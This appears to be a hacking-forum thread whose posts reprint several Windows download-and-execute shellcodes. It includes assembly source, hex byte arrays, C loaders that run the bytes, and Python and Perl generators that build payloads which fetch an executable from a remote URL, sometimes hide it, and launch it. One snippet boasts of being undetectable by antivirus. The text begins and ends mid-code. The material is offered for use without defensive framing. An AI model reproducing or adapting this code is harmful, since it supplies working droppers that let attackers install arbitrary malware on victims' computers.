x44\x61\x4f\x31\xd8\x50\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\x95\xe6\xb1\x77\xff\xd3\xbb\xcf\x2a\xae\x77\xff\xd3"; fprintf(stdout,"Length: %d\n\n",strlen(shellcode)); (*(void(*)()) shellcode)(); } ======================================= C:\Users\Ali\Desktop>gcc shellcode.c -o shellcode.exe C:\Users\Ali\Desktop>shellcode.exe Length: 173 C:\Users\Ali\Desktop> #notice : when program exit, you must wait 2-3 second , it will finish download and execute file after 2-3 second ''' import random,binascii chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz123456789=[]-' p1 = '''xor eax,eax push eax ''' p2 = ''' mov eax,esp mov ebx,0x01414141 shr ebx,0x08 shr ebx,0x08 shr ebx,0x08 push ebx push eax mov ebx,0x77b1e695 call ebx mov ebx,0x77ae2acf call ebx ''' sen1 = str(raw_input('Enter url\nExample: http://z3r0d4y.com/file.exe \nEnter:')) sen1 = sen1.rsplit() sen1 = sen1[0] sen2 = str(raw_input('Enter filename\nExample: D:\\file.exe\nEnter:')) sen2 = sen2.rsplit() sen2 = sen2[0] sen = '''powershell -command "& { (New-Object Net.WebClient).DownloadFile('%s', '%s')};%s"''' %(sen1,sen2,sen2) m = 0 for word in sen: m += 1 m = m - 1 stack = '' while(m>=0): stack += sen[m] m -= 1 stack = stack.encode('hex') skip = 1 if len(stack) % 8 == 0: skip = 0 if skip is 1: stack = '00' + stack if len(stack) % 8 == 0: skip = 0 if skip is 1: stack = '00' + stack if len(stack) % 8 == 0: skip = 0 if skip is 1: stack = '00' + stack if len(stack) % 8 == 0: skip = 0 if len(stack) % 8 == 0: zxzxzxz = 0 m = len(stack) / 8 c = 0 n = 0 z = 8 shf = open('shellcode.asm','w') shf.write(p1) shf.close() shf = open('shellcode.asm','a') while(c<m): v = 'push 0x' + stack[n:z] skip = 0 if '0x000000' in v: skip = 1 q1 = v[13:] v = 'push 0x' + q1 + '414141' + '\n' + 'pop eax\nshr eax,0x08\nshr eax,0x08\nshr eax,0x08\npush eax\n' if '0x0000' in v: skip = 1 q1 = v[11:] v = 'push 0x' + q1 + '4141' + '\n' + 'pop eax\nshr eax,0x08\nshr eax,0x08\npush eax\n' if '0x00' in v: skip = 1 q1 = v[9:] v = 'push 0x' + q1 + '41' + '\n' + 'pop eax\nshr eax,0x08\npush eax\n' if skip is 1: shf.write(v) if skip is 0: v = v.rsplit() zzz = '' for w in v: if '0x' in w: zzz = str(w) s1 = binascii.b2a_hex(''.join(random.choice(chars) for i in range(4))) s1 = '0x%s'%s1 data = "%x" % (int(zzz, 16) ^ int(s1, 16)) v = 'mov eax,0x%s\nmov ebx,%s\nxor eax,ebx\npush eax\n'%(data,s1) shf.write(v) n += 8 z += 8 c += 1 shf.write(p2) shf.close()
  13. Moeein Seven

    Hacking

    /* # Title : Windows x64 Download+Execute Shellcode # Author : Roziul Hasan Khan Shifat # Date : 24-11-2016 # size : 358 bytes # Tested on : Windows 7 x64 Professional # Email : shifath12@gmail.com */ /* section .text global _start _start: ;----------------------------- sub rsp,88 lea r14,[rsp] sub rsp,88 ;------------------------------------------------ xor rdx,rdx mov rax,[gs:rdx+0x60] ;PEB mov rsi,[rax+0x18] ;PEB.Ldr mov rsi,[rsi+0x10] ;PEB.Ldr->InMemOrderModuleList lodsq mov rsi,[rax] mov rdi,[rsi+0x30] ;kernel32.dll base address ;--------------------------------------------------- mov ebx,[rdi+0x3c] ;elf_anew add rbx,rdi mov dl,0x88 mov ebx,[rbx+rdx] add rbx,rdi mov esi,[rbx+0x1c] add rsi,rdi ;-------------------------------------------------- ;loading urlmon.dll mov dx,831 mov ebx,[rsi+rdx*4] add rbx,rdi xor rdx,rdx mov [r14],dword 'urlm' mov [r14+4],word 'on' mov [r14+6],byte dl lea rcx,[r14] call rbx mov dx,586 mov ebx,[rsi+rdx*4] add rbx,rdi xor rdx,rdx mov rcx,'URLDownl' mov [r14],rcx mov rcx,'oadToFil' mov [r14+8],rcx mov [r14+16],word 'eA' mov [r14+18],byte dl lea rdx,[r14] mov rcx,rax call rbx ;;;;;;;;;;;;;;;;;;;;;;------------------------------------- mov r15,rax ;------------------------------------------------ ;save as 'C:\\Users\\Public\\p.exe' length: 24+1 mov rax,'C:\\User' mov [r14],rax mov rax,'s\\Publi' mov [r14+8],rax mov rax,'c\\p.exe' mov [r14+16],rax xor rdx,rdx mov [r14+24],byte dl ;---------------------------------------- lea rcx,[r14+25] ;url "http://192.168.10.129/pl.exe" length: 28+1 mov rax,'http://1' mov [rcx],rax mov rax,'92.168.1' mov [rcx+8],rax mov rax,'0.129/pl' mov [rcx+16],rax mov [rcx+24],dword '.exe' mov [rcx+28],byte dl ;--------------------------------------------------- sub rsp,88 download: xor rcx,rcx lea rdx,[r14+25] lea r8,[r14] xor r9,r9 mov [rsp+32],r9 call r15 xor rdx,rdx cmp rax,rdx jnz download ;------------------------------------------------ sub rsp,88 ;----------------------------------------------- ;hiding file mov dx,1131 mov ebx,[rsi+rdx*4] add rbx,rdi ;SetFileAttributesA() lea rcx,[r14] xor rdx,rdx mov dl,2 call rbx ;------------------------------------ ;executing file xor rdx,rdx mov dx,1314 mov ebx,[rsi+rdx*4] add rbx,rdi ;WinExec() lea rcx,[r14] xor rdx,rdx call rbx ;------------------------------ xor rdx,rdx mov dx,296 mov ebx,[rsi+rdx*4] add rbx,rdi ;--------------------------------------- ;if U use this shellcode for pe injection, then don't forget to free allocated space add rsp,88 xor rcx,rcx call rbx */ /* Disassembly of section .text: 0000000000000000 <_start>: 0: 48 83 ec 58 sub $0x58,%rsp 4: 4c 8d 34 24 lea (%rsp),%r14 8: 48 83 ec 58 sub $0x58,%rsp c: 48 31 d2 xor %rdx,%rdx f: 65 48 8b 42 60 mov %gs:0x60(%rdx),%rax 14: 48 8b 70 18 mov 0x18(%rax),%rsi 18: 48 8b 76 10 mov 0x10(%rsi),%rsi 1c: 48 ad lods %ds:(%rsi),%rax 1e: 48 8b 30 mov (%rax),%rsi 21: 48 8b 7e 30 mov 0x30(%rsi),%rdi 25: 8b 5f 3c mov 0x3c(%rdi),%ebx 28: 48 01 fb add %rdi,%rbx 2b: b2 88 mov $0x88,%dl 2d: 8b 1c 13 mov (%rbx,%rdx,1),%ebx 30: 48 01 fb add %rdi,%rbx 33: 8b 73 1c mov 0x1c(%rbx),%esi 36: 48 01 fe add %rdi,%rsi 39: 66 ba 3f 03 mov $0x33f,%dx 3d: 8b 1c 96 mov (%rsi,%rdx,4),%ebx 40: 48 01 fb add %rdi,%rbx 43: 48 31 d2 xor %rdx,%rdx 46: 41 c7 06 75 72 6c 6d movl $0x6d6c7275,(%r14) 4d: 66 41 c7 46 04 6f 6e movw $0x6e6f,0x4(%r14) 54: 41 88 56 06 mov %dl,0x6(%r14) 58: 49 8d 0e lea (%r14),%rcx 5b: ff d3 callq *%rbx 5d: 66 ba 4a 02 mov $0x24a,%dx 61: 8b 1c 96 mov (%rsi,%rdx,4),%ebx 64: 48 01 fb add %rdi,%rbx 67: 48 31 d2 xor %rdx,%rdx 6a: 48 b9 55 52 4c 44 6f movabs $0x6c6e776f444c5255,%rcx 71: 77 6e 6c 74: 49 89 0e mov %rcx,(%r14) 77: 48 b9 6f 61 64 54 6f movabs $0x6c69466f5464616f,%rcx 7e: 46 69 6c 81: 49 89 4e 08 mov %rcx,0x8(%r14) 85: 66 41 c7 46 10 65 41 movw $0x4165,0x10(%r14) 8c: 41 88 56 12 mov %dl,0x12(%r14) 90: 49 8d 16 lea (%r14),%rdx 93: 48 89 c1 mov %rax,%rcx 96: ff d3 callq *%rbx 98: 49 89 c7 mov %rax,%r15 9b: 48 b8 43 3a 5c 5c 55 movabs $0x726573555c5c3a43,%rax a2: 73 65 72 a5: 49 89 06 mov %rax,(%r14) a8: 48 b8 73 5c 5c 50 75 movabs $0x696c6275505c5c73,%rax af: 62 6c 69 b2: 49 89 46 08 mov %rax,0x8(%r14) b6: 48 b8 63 5c 5c 70 2e movabs $0x6578652e705c5c63,%rax bd: 65 78 65 c0: 49 89 46 10 mov %rax,0x10(%r14) c4: 48 31 d2 xor %rdx,%rdx c7: 41 88 56 18 mov %dl,0x18(%r14) cb: 49 8d 4e 19 lea 0x19(%r14),%rcx cf: 48 b8 68 74 74 70 3a movabs $0x312f2f3a70747468,%rax d6: 2f 2f 31 d9: 48 89 01 mov %rax,(%rcx) dc: 48 b8 39 32 2e 31 36 movabs $0x312e3836312e3239,%rax e3: 38 2e 31 e6: 48 89 41 08 mov %rax,0x8(%rcx) ea: 48 b8 30 2e 31 32 39 movabs $0x6c702f3932312e30,%rax f1: 2f 70 6c f4: 48 89 41 10 mov %rax,0x10(%rcx) f8: c7 41 18 2e 65 78 65 movl $0x6578652e,0x18(%rcx) ff: 88 51 1c mov %dl,0x1c(%rcx) 102: 48 83 ec 58 sub $0x58,%rsp 0000000000000106 <download>: 106: 48 31 c9 xor %rcx,%rcx 109: 49 8d 56 19 lea 0x19(%r14),%rdx 10d: 4d 8d 06 lea (%r14),%r8 110: 4d 31 c9 xor %r9,%r9 113: 4c 89 4c 24 20 mov %r9,0x20(%rsp) 118: 41 ff d7 callq *%r15 11b: 48 31 d2 xor %rdx,%rdx 11e: 48 39 d0 cmp %rdx,%rax 121: 75 e3 jne 106 <download> 123: 48 83 ec 58 sub $0x58,%rsp 127: 66 ba 6b 04 mov $0x46b,%dx 12b: 8b 1c 96 mov (%rsi,%rdx,4),%ebx 12e: 48 01 fb add %rdi,%rbx 131: 49 8d 0e lea (%r14),%rcx 134: 48 31 d2 xor %rdx,%rdx 137: b2 02 mov $0x2,%dl 139: ff d3 callq *%rbx 13b: 48 31 d2 xor %rdx,%rdx 13e: 66 ba 22 05 mov $0x522,%dx 142: 8b 1c 96 mov (%rsi,%rdx,4),%ebx 145: 48 01 fb add %rdi,%rbx 148: 49 8d 0e lea (%r14),%rcx 14b: 48 31 d2 xor %rdx,%rdx 14e: ff d3 callq *%rbx 150: 48 31 d2 xor %rdx,%rdx 153: 66 ba 28 01 mov $0x128,%dx 157: 8b 1c 96 mov (%rsi,%rdx,4),%ebx 15a: 48 01 fb add %rdi,%rbx 15d: 48 83 c4 58 add $0x58,%rsp 161: 48 31 c9 xor %rcx,%rcx 164: ff d3 callq *%rbx */ #include<windows.h> #include<stdio.h> #include<string.h> char shellcode[]=\ "\x48\x83\xec\x58\x4c\x8d\x34\x24\x48\x83\xec\x58\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x70\x18\x48\x8b\x76\x10\x48\xad\x48\x8b\x30\x48\x8b\x7e\x30\x8b\x5f\x3c\x48\x01\xfb\xb2\x88\x8b\x1c\x13\x48\x01\xfb\x8b\x73\x1c\x48\x01\xfe\x66\xba\x3f\x03\x8b\x1c\x96\x48\x01\xfb\x48\x31\xd2\x41\xc7\x06\x75\x72\x6c\x6d\x66\x41\xc7\x46\x04\x6f\x6e\x41\x88\x56\x06\x49\x8d\x0e\xff\xd3\x66\xba\x4a\x02\x8b\x1c\x96\x48\x01\xfb\x48\x31\xd2\x48\xb9\x55\x52\x4c\x44\x6f\x77\x6e\x6c\x49\x89\x0e\x48\xb9\x6f\x61\x64\x54\x6f\x46\x69\x6c\x49\x89\x4e\x08\x66\x41\xc7\x46\x10\x65\x41\x41\x88\x56\x12\x49\x8d\x16\x48\x89\xc1\xff\xd3\x49\x89\xc7\x48\xb8\x43\x3a\x5c\x5c\x55\x73\x65\x72\x49\x89\x06\x48\xb8\x73\x5c\x5c\x50\x75\x62\x6c\x69\x49\x89\x46\x08\x48\xb8\x63\x5c\x5c\x70\x2e\x65\x78\x65\x49\x89\x46\x10\x48\x31\xd2\x41\x88\x56\x18\x49\x8d\x4e\x19\x48\xb8\x68\x74\x74\x70\x3a\x2f\x2f\x31\x48\x89\x01\x48\xb8\x39\x32\x2e\x31\x36\x38\x2e\x31\x48\x89\x41\x08\x48\xb8\x30\x2e\x31\x32\x39\x2f\x70\x6c\x48\x89\x41\x10\xc7\x41\x18\x2e\x65\x78\x65\x88\x51\x1c\x48\x83\xec\x58\x48\x31\xc9\x49\x8d\x56\x19\x4d\x8d\x06\x4d\x31\xc9\x4c\x89\x4c\x24\x20\x41\xff\xd7\x48\x31\xd2\x48\x39\xd0\x75\xe3\x48\x83\xec\x58\x66\xba\x6b\x04\x8b\x1c\x96\x48\x01\xfb\x49\x8d\x0e\x48\x31\xd2\xb2\x02\xff\xd3\x48\x31\xd2\x66\xba\x22\x05\x8b\x1c\x96\x48\x01\xfb\x49\x8d\x0e\x48\x31\xd2\xff\xd3\x48\x31\xd2\x66\xba\x28\x01\x8b\x1c\x96\x48\x01\xfb\x48\x83\xc4\x58\x48\x31\xc9\xff\xd3"; int main() { int len=strlen(shellcode); DWORD l=0; printf("shellcode length : %d\n",len); VirtualProtect(shellcode,len,PAGE_EXECUTE_READWRITE,&l); (* (int(*)()) shellcode)(); return 0; }
  14. ; ; dexec64.asm - 218+ bytes (unoptimised) ; ; Win64 asm code, download & execute file using URLDownloadToFileA moniker & WinExec ; ; tested on AMD64 running Windows x64 SP1 ; ; there probably are errors in the code, but this is more of an experimental source if nothing else. ; send corrections or errors to: 'weiss' wyse101 [at] gmail [dot] com ; code is not optimised at all, doesn't contain null bytes, so is possibly suitable for testing exploits on win64 ; ; one of the main stumbling blocks in coding x64 asm on windows is the alignment of the stack. ; it must be aligned by 16 bytes because windows uses 128-bit SSE2, otherwise the api call will fail. ; ; thanx: ; ; roy g biv/29a - http://www.29a.net/ ; Feryno - http://feryno.host.sk ; Tomasz Grysztar - http://flatassembler.org ; format PE64 console 4.0 entry entrypoint section '.text' code readable writeable executable ; assumed to be writeable when in memory, no NX obstruction! ; 1*8 is used rather than 0*8 because it uses null byte LoadLibraryA equ rbp+1*8 ; using rbp is smaller than using ebp on 64-bit WinExec equ rbp+2*8 URLDownloadToFileA equ rbp+3*8 ; must be rbp because of 64-bit URLMON base address entrypoint: jmp get_eip load_dta: pop rax push rax lea r15,[rax-(setup_stack-hashes)] inc byte [rax-(setup_stack-url_end)] ; nullify tail end of url inc byte [rax-(setup_stack-fname_end)] ; nullify end of filename inc byte [rax-(setup_stack-url_mon_end)] ; nullify end of URLMON ret ; go! hashes: dw 0bb86h ; LoadLibraryA() 635bbb86 dw 0a333h ; WinExec() 208da333 db 'URLMON',0ffh,0ffh url_mon_end = $-2 dw 05f92h ; URLDownloadToFileA c91e5f92 dq -1 fname: db 'trojan.exe',0ffh ; what to save as fname_end = $-1 url: db 'http://localhost/trojan.exe',0ffh ; where to download file from url_end = $-1 get_eip: call load_dta setup_stack: add rsp,-(4*8) ; 3 api variables, + 1 for avoiding null :-| push rsp pop rbp ; rbp = table of api mov rdi,rbp ; rdi points to table also stosq ; doesn't really do anything. add rsp,-(11*8) ; reserve space for windows, when calling api push 60h ; Hello, Ratter. 8-D pop rcx mov rax,[gs:rcx] ; Peb mov rax,[rax+18h] ; PebLdr mov rsi,[rax+30h] ; Ldr.InInitializationOrderModuleList lodsq ; skip ntdll.dll mov rbx,[rax+10h] ; kernel32.dll base mov cl,2 ; get 2 api first get_apis_loop: mov eax,dword[rbx+3ch] ; MZ header size lea rsi,[rbx+rax+78h] ; export directory begins at 88h mov eax,dword[rsi+10h] ; extra instructions needed to avoid null bytes lea rsi,[rbx+rax+1ch] lodsd lea r9,[rax+rbx] lodsd lea r10,[rax+rbx] lodsd lea r11,[rax+rbx] xor r12,r12 load_index: mov esi,dword[r10+4*r12] add rsi,rbx inc r12 xor eax,eax cdq hash_export: lodsb add edx,eax rol edx, 5 dec eax jns hash_export ror edx, 5 cmp dx,word [r15] ; found api? jne load_index movzx edx,word [r11+2*r12-2] mov eax,[r9+4*rdx] add rax,rbx add r15,2 ; skip hash stosq ; save api address loop get_apis_loop push r15 ; push/pop to avoid null with mov pop rcx call qword[LoadLibraryA] xchg rax,rbx add r15,8 ; skip URLMON, first time. push 1 ; get 1 api from URLMON pop rcx test rbx,rbx ; continue if not zero jne get_apis_loop dec ecx push rbx sub rsp,3*8 ; needed to align stack xor r9,r9 mov r8,r15 lea rdx,[r8+(url-fname)] call qword[URLDownloadToFileA] push 1 pop rdx mov rcx,r15 call qword[WinExec] ; WinExec("trojan.exe",SW_SHOWNORMAL??); ;jmp $ ; hang call qword[ExitProcess] ; not required, testing only ; section below not required, simply for testing. section '.idata' import data readable writeable dd 0,0,0,RVA kernel_name,RVA kernel_table dd 0,0,0,0,0 kernel_table: ExitProcess dq RVA _ExitProcess dq 0 kernel_name db 'KERNEL32.DLL',0 _ExitProcess dw 0 db 'ExitProcess',0 ; July 2006 - (Ireland)
  15. Moeein Seven

    Hacking

    #!/usr/bin/perl $loading_url=$ARGV[0]; chomp ($loading_url); my @buffer; if ($loading_url eq "") { $sco = 'ERROR!!! Enter url to remote exe.'; buffer_gen($sco); print @buffer; exit; } $c= generate_char(0); $sco= "\xE8\x56\x00\x00\x00\x53\x55\x56\x57\x8B\x6C\x24\x18\x8B\x45". "\x3C\x8B\x54\x05\x78\x01\xEA\x8B\x4A\x18\x8B\x5A\x20\x01\xEB". "\xE3\x32\x49\x8B\x34\x8B\x01\xEE\x31\xFF\xFC\x31\xC0\xAC\x38". "\xE0\x74\x07\xC1\xCF\x0D\x01\xC7\xEB\xF2\x3B\x7C\x24\x14\x75". "\xE1\x8B\x5A\x24\x01\xEB\x66\x8B\x0C\x4B\x8B\x5A\x1C\x01\xEB". "\x8B\x04\x8B\x01\xE8\xEB\x02\x31\xC0\x5F\x5E\x5D\x5B\xC2\x08". "\x00\x5E\x6A\x30\x59\x64\x8B\x19\x8B\x5B\x0C\x8B\x5B\x1C\x8B". "\x1B\x8B\x5B\x08\x53\x68\x8E\x4E\x0E\xEC\xFF\xD6\x89\xC7\x53". "\x68\x8E\x4E\x0E\xEC\xFF\xD6\xEB\x50\x5A\x52\xFF\xD0\x89\xC2". "\x52\x52\x53\x68\xAA\xFC\x0D\x7C\xFF\xD6\x5A\xEB\x4D\x59\x51". "\x52\xFF\xD0\xEB\x72\x5A\xEB\x5B\x59\x6A\x00\x6A\x00\x51\x52". "\x6A\x00\xFF\xD0\x53\x68\xA0\xD5\xC9\x4D\xFF\xD6\x5A\x52\xFF". "\xD0\x53\x68\x98\xFE\x8A\x0E\xFF\xD6\xEB\x44\x59\x6A\x00\x51". "\xFF\xD0\x53\x68\x7E\xD8\xE2\x73\xFF\xD6\x6A\x00\xFF\xD0\xE8". "\xAB\xFF\xFF\xFF\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00". "\xE8\xAE\xFF\xFF\xFF\x55\x52\x4C\x44\x6F\x77\x6E\x6C\x6F\x61". "\x64\x54\x6F\x46\x69\x6C\x65\x41\x00\xE8\xA0\xFF\xFF\xFF\x2E". "\x2E\x5C".$c."\x00\xE8\xB7\xFF\xFF\xFF\x2E\x2E\x5C".$c."\x00". "\xE8\x89\xFF\xFF\xFF".$loading_url."\x00"; $sco=convert_sco($sco); buffer_gen($sco); print @buffer; sub generate_char() { my $wdsize = shift; my @alphanumeric = ('a'..'z'); my $wd = join '', map $alphanumeric[rand @alphanumeric], 0..$wdsize; return $wd; } sub convert_sco { my $data = shift; my $mode = shift() || 'LE'; my $code = ''; my $idx = 0; if (length($data) % 2 != 0) { $data .= substr($data, -1, 1); } while ($idx < length($data) - 1) { my $c1 = ord(substr($data, $idx, 1)); my $c2 = ord(substr($data, $idx+1, 1)); if ($mode eq 'LE') { $code .= sprintf('%%u%.2x%.2x', $c2, $c1); } else { $code .= sprintf('%%u%.2x%.2x', $c1, $c2); } $idx += 2; } return $code; } sub buffer_gen(){ $sco = shift; @buffer=<<FX; Win32 Download and Execute Shellcode Generator (browsers edition) Size: 275 bytes + loading_url Author: Yag Kohha (skyhole [at] gmail.com) Usage: ./sco http://remote_server/loader.exe Greetz to: str0ke \& milw0rm project shinnai h07 rgod H.D. Moor \& Metaspl0it offtopic 3APA3A -------> Start $sco -------> End FX }
  16. Moeein Seven

    Hacking

    ;Tiny Download&&Exec ShellCode codz czy 2007.6.1 ;header 163=61(16+8+9+(28))+95(68+27)+17 ;163+19=192 comment % #--------------------------------------# # # Tiny Download&&Exec ShellCode--> # # # -->size 192 # # # 2007.06.01 # # codz: czy # # # www.ph4nt0m.org # # #------------------------------------------# # system :test on ie6+XPSP2/2003SP2/2kSP4 % .586 .model flat,stdcall option casemap:none include c:\masm32\include\windows.inc include c:\masm32\include\kernel32.inc includelib c:\masm32\lib\kernel32.lib include c:\masm32\include\user32.inc includelib c:\masm32\lib\user32.lib .data shelldatabuffer db 1024 dup(0) shellcodebuffer db 2046 dup(0) downshell db 'down exploit',0 .code start: invoke MessageBoxA,0,offset downshell,offset downshell,1 invoke RtlMoveMemory,offset shellcodebuffer,00401040H,256 mov eax,offset shellcodebuffer jmp eax somenops db 90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h ;ÉÃÂÃæµÄ´úÂëÊÇ°ÑÔÚ´úÂë¶ÎÖõÄshellcodeÒƶ¯Êý¾Ã¶ÎÖÃÂÖ´ÃÂã¬Ä£ÄâÕæʵµÄshellcodeÖ´ÃÂû·¾³ @@shellcodebegin: call @@beginaddr @@beginaddr: PUSH 03H ;Òªµ÷ÓõÄAPIº¯Êý¸öÊý jmp @@realshellcode myExitProcess dd 073e2d87eh myWinExec dd 00e8afe98h myLoadLibraryA dd 0ec0e4e8eh dll db 'URLMON',0,0 myUrlDownFile dd 0702f1a36h path db 'c:\a.exe',0 url db 'http://www.ph4nt0m.org/a.exe',0 @@realshellcode: POP ECX POP EDI SCASD ;edi+4 ;µÃµ½kernel32.dll»ùµØÖ· db 67h,64h,0A1h,30h,00h mov eax, [eax+0cH] mov esi, [eax+1cH] lodsd mov ebp, [eax+08H] ;EBPÖôæ·Åkernel32.dllµÄ»ùµØÖ· ;´¦Àíµ¼³ö±í @@next2: PUSH ECX @@next3: MOV ESI,[EBP+3Ch] MOV ESI,[EBP+ESI+78h] ADD ESI,EBP PUSH ESI MOV ESI,[ESI+20h] ADD ESI,EBP XOR ECX,ECX DEC ECX @@next: INC ECX LODSD ADD EAX,EBP XOR EBX,EBX @@again: MOVSX EDX,BYTE PTR [EAX] CMP DL,DH JZ @@end ROR EBX,0Dh ADD EBX,EDX INC EAX JMP @@again @@end: CMP EBX,[EDI] JNZ @@next POP ESI MOV EBX,[ESI+24h] ADD EBX,EBP MOV CX,WORD PTR [ECX*2+EBX] MOV EBX,[ESI+1Ch] ADD EBX,EBP MOV EAX,[ECX*4+EBX] ADD EAX,EBP STOSD POP ECX loop @@next2 mov ecx,[edi] ;2 cmp cl,'c' ;3 jz @@downfile ;2 PUSH EDI CALL EAX ;2 xchg eax,ebp scasd scasd push 01 ;2µÚ¶þ¸öDLLµÄº¯Êý¸öÊý jmp @@next3 ;2 ;×ܼÆ17 @@downfile: push edx ;0 push edx ;0 push edi ;file=c:\a.exe lea ecx, dword ptr [edi+9h] push ecx ;url push edx ;0 call eax ;URLDownloadToFileA,0,url,file=c:\a.exe,0,0 push 1 ;FOR TEST push edi call dword ptr [edi-14H] ;winexec,'c:\xxx.exe',1 call dword ptr [edi-18H] ;Exitprocess somenops2 db 90h,90h,90h,90h,90h,90h,90h,90h,90h invoke ExitProcess,0 end start
  17. Moeein Seven

    Hacking

    ; ; relocateable dynamic runtime assembly code example using hash lookup *** for IE exploits only *** ; the URLMON.DLL must already be loaded into the process space for this to work, so do not run on its own!! ; ; to test use /DTEST_CODE in ml command line ; ; URLDownLoadToFileA() / WinExec() / ExitProcess() | ExitThread() ; ; 124 bytes ; ; for testing: ; ; ml /c /coff /Cp /DTEST_CODE dexec32.asm ; link /subsystem:windows /section:.text,w dexec32.obj urlmon.lib ; ; wyse101 [at] gmail.com ; ; March 2007 ; .386 .model flat,stdcall ROL_CONSTANT equ 5 mrol macro iNum:req,iBits:req exitm <(iNum shl iBits) or (iNum shr (32-iBits))> endm mror macro iNum:req,iBits:req exitm <(iNum shr iBits) or (iNum shl (32-iBits))> endm hashapi macro szApi local dwApi dwApi = 0 forc x,szApi dwApi = dwApi + '&x' dwApi = mrol(dwApi,ROL_CONSTANT) endm dwApi = mrol(dwApi,ROL_CONSTANT) dw (dwApi and 0ffffh) endm .code assume fs:nothing code_start: jmp load_data IFDEF TEST_CODE extern URLDownloadToFileA :proc call URLDownloadToFileA ; included when assembled with /DTEST_CODE ENDIF setup_parameters: pop edi ; offset @cmd_start xor eax,eax ; eax = 0 cdq ; edx = 0 ; ******************************************************************** push eax ; exit code = 0 ; ******************************************************************** push eax ; SW_HIDE mov dl,(@cmd_end-@cmd_start)-1 ; this allows command up to 255 bytes push edi ; file name to execute ; ******************************************************************** push eax ; callback routine URLDownLoadToFileA push eax ; reserved, must be zero push edi ; file name to save as add edi,edx ; get offset of @url_start-1 stosb ; zero tail end mov dl,(@url_end-@url_start)-1 ; limit of 255 bytes for url push edi ; url to download file from push eax ; interface add edi,edx ; get offset of @urlmon-1 stosb ; zero tail end of url ; ********************************************************************* load_modules: push edi ; save current offset to hashes push 30h pop ecx mov eax,fs:[ecx] ; PEB base address mov eax,[eax+0ch] ; PEB_LDR_DATA LoaderData mov ebp,[eax+1ch] ; LIST_ENTRY InMemoryOrderModuleList scan_dll: mov ebx,[ebp+8] ; DllBase mov ebp,[ebp] ; Flink push ebp ; save mov eax,[ebx+3ch] mov eax,[ebx+eax+78h] ; IMAGE_DIRECTORY_ENTRY_EXPORT lea esi,[ebx+eax+18h] ; offset IMAGE_EXPORT_DIRECTORY.NumberOfNames lodsd xchg eax,ecx ; ecx = NumberOfNames lodsd add eax,ebx ; AddressOfFunctions push eax lodsd lea edi,[eax+ebx] ; AddressOfNames lodsd lea ebp,[eax+ebx] ; ebp = AddressOfNameOrdinals load_api: mov esi,[edi+4*ecx-4] add esi,ebx xor eax,eax cdq hash_api: lodsb add edx,eax rol edx,ROL_CONSTANT dec eax jns hash_api mov esi,[esp+8] ; get api hashes cmp dx,word ptr[esi] ; found a match? je call_api loop load_api pop eax ; check pop ebp ; jmp scan_dll call_api: pop eax movzx edx,word ptr [ebp+2*ecx-2] add ebx,[eax+4*edx] pop ebp ; modules pop edi ; api hashes call ebx ; call api stosw ; advance 2 bytes to next hash jmp load_modules ; do another, just keep going until ExitProcess is reached. ; ************************* load_data: call setup_parameters @cmd_start: db 'file.exe',0ffh ; WinExec("file.exe",SW_HIDE); @cmd_end: @url_start: db 'http://127.0.0.1/file.exe',0ffh ; url of file to download @url_end: hashapi <URLDownloadToFileA> hashapi <WinExec> hashapi <ExitProcess> ; ********************************************************************* end code_start
  18. Moeein Seven

    Hacking

    /* \ ______________________WIN_SHELLCODE__________________________ / :: win32 download & exec shellcode :: \ :: by Darkeagle of Unl0ck Research Team [http://exploiterz.org] :: / :: to avoid 0x00 use ^^xor^^ }:> :: \ :: greets goes to: Sowhat, 0x557 guys, 55k7 guys, RST/GHC guys. :: / ::_____________________________cya______________________________:: \ */ #include <stdio.h> #include <string.h> unsigned char sh4llcode[] = "\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03" "\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74" "\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E" "\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03" "\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C" "\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40" "\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C" "\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC" "\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F" "\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB" "\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83" "\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF" "\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF" "http://h0nest.org/1.exe"; int main() { void (*c0de)(); printf("Win32 \"download & exec shellcode\"\n"); *(int*)&c0de = sh4llcode; c0de(); }
  19. Moeein Seven

    Hacking

    /* [+] Author : B3mB4m [~] Contact : b3mb4m@protonmail.com [~] Project : https://github.com/b3mb4m/shellsploit-framework [~] Greetz : Bomberman,T-Rex,Pixi ----------------------------------------------------------- Tested on : Windows XP/SP3 x86 Windows 7 Ultimate x64 Windows 8.1 Pro Build 9600 x64 Windows 10 Home x64 * This source belongs to shellsploit project under MIT licence. * If you convert it an executable file, its will be FUD(without any encrypt). -PoC : https://nodistribute.com/result/qwxU3DmFCR2M0OrQt 0x0: 31c9 xor ecx, ecx 0x2: b957696e45 mov ecx, 0x456e6957 0x7: eb04 jmp 0xd 0x9: 31c9 xor ecx, ecx 0xb: eb00 jmp 0xd 0xd: 31c0 xor eax, eax 0xf: 31db xor ebx, ebx 0x11: 31d2 xor edx, edx 0x13: 31ff xor edi, edi 0x15: 31f6 xor esi, esi 0x17: 648b7b30 mov edi, dword ptr fs:[ebx + 